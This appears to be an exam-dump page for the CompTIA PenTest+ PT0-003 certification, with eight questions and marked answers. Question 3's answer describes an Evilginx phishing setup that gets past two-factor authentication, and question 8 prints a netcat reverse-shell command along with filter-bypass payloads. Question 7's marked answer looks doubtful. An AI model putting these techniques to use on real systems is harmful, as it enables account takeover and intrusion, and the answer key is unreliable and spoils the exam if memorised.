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CompTIA PT0-003 Test Dumps

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Last Updated: 24-Feb-2025
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Question # 1

A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output:
200; GET /login.aspx HTTP/1.1 Host:; User-Agent: Mozilla/5.0
200; GET /login.aspx HTTP/1.1 Host:; User-Agent: Mozilla/5.0
No response; POST /login.aspx HTTP/1.1 Host:; User-Agent: curl
200; POST /login.aspx HTTP/1.1 Host:; User-Agent: Mozilla/5.0
No response; GET /login.aspx HTTP/1.1 Host:; User-Agent: python
Which of the following actions should the tester take to get the scans to work properly?
A. Modify the scanner to slow down the scan.
B. Change the source IP with a VPN.
C. Modify the scanner to only use HTTP GET requests.
D. Modify the scanner user agent.

  Modify the scanner user agent.

Question # 2

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?
A. Testing window
B. Terms of service
C. Authorization letter
D. Shared responsibilities

  Testing window

Question # 3

A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work. Which of the following should the tester do to get access to these accounts?
A. Configure an external domain using a typosquatting technique. Configure Evilginx to bypass two-factor authentication using a phishlet that simulates the mail portal for the company.
B. Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a brute-force attack method.
C. Configure an external domain using a typosquatting technique. Configure SET to bypass two-factor authentication using a phishlet that mimics the mail portal for the company.
D. Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a vishing method.

  Configure an external domain using a typosquatting technique. Configure Evilginx to bypass two-factor authentication using a phishlet that simulates the mail portal for the company.

Question # 4

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?
A. Service discovery
B. OS fingerprinting
C. Host discovery
D. DNS enumeration

  Host discovery

Question # 5

During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:
Weaker password settings than the company standard
Systems without the company's endpoint security software installed
Operating systems that were not updated by the patch management system
Which of the following recommendations should the penetration tester provide to address the root issue?
A. Add all systems to the vulnerability management system.
B. Implement a configuration management system.
C. Deploy an endpoint detection and response system.
D. Patch the out-of-date operating systems.

  Implement a configuration management system.

Question # 6

Which of the following components should a penetration tester include in an assessment report?
A. User activities
B. Customer remediation plan
C. Key management
D. Attack narrative

  Attack narrative

Question # 7

As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?
A. Logic bomb
B. SQL injection
C. Brute-force attack
D. Cross-site scripting

  SQL injection

Question # 8

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:
nc -e /bin/sh 4444
Which of the following would most likely bypass the filtered space character?
A. ${IFS}
B. %0a
C. + *
D. %20


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CompTIA PenTest+ Exam Exam Dumps

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